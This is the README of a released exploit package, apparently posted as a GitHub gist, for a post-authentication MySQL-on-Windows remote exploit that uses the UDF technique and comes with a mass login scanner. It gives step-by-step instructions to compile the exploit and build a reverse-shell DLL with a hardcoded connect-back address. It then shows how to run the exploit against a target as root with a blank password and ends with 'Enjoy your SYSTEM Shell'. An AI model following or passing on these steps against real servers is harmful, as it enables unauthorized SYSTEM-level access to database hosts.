| *** | |
| FARLiGHT ELiTE HACKERS LEGACY R3L3ASE | |
| *** | |
| Attached is the MySQL Windows Remote Exploit (post-auth, udf | |
| technique) including the previously released mass scanner. | |
| The exploit is mirrored at the farlight website http://www.farlight.org. | |
| Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday | |
| All owned By Kingcope | |
| https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23073.tar.gz | |
| Installation Instructions | |
| ============================= | |
| 1. Install mysql client libraries and headers (UNIX) | |
| RedHat based (e.g. CentOS): | |
| yum install mysql mysql-devel | |
| 2. Compile the standalone exploit | |
| issue commands: | |
| gcc mysqljackpot.c -o mysqljackpot -L/usr/lib/mysql -lmysqlclient | |
| 3. Compile the reverse shell payload (this is required!) | |
| required because the connect back ip and port are hardcoded in the dll: | |
| use mingw on windows or wine | |
| change REVERSEIP and REVERSEPORT to suit your needs. If you change REVERSEPORT you have | |
| to change the port in mysqljackpot.c too (default port: 443). | |
| issue commands: | |
| set PATH=%PATH%;c:\MinGW\bin\ | |
| gcc -c payload.c | |
| gcc -shared -o payload.dll payload.o -lws2_32 | |
| copy the payload.dll into the mysqljackpot exploit folder | |
| 4. Run The Exploit | |
| ./mysqljackpot -u root -p "" -t 99.99.99.99 | |
| A valid database admin user and his password are required | |
| for the exploit to work properly. | |
| This exploit is especially useful when used in connection | |
| to a MySQL login scanner, see scanner/README.mysql inside this package. | |
| Be sure to have the firewall open on the desired reverse port | |
| on the attacking machine. | |
| 5. Enjoy your SYSTEM Shell!!! | |
| Yours Sincerely, | |
| -- Kingcope | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment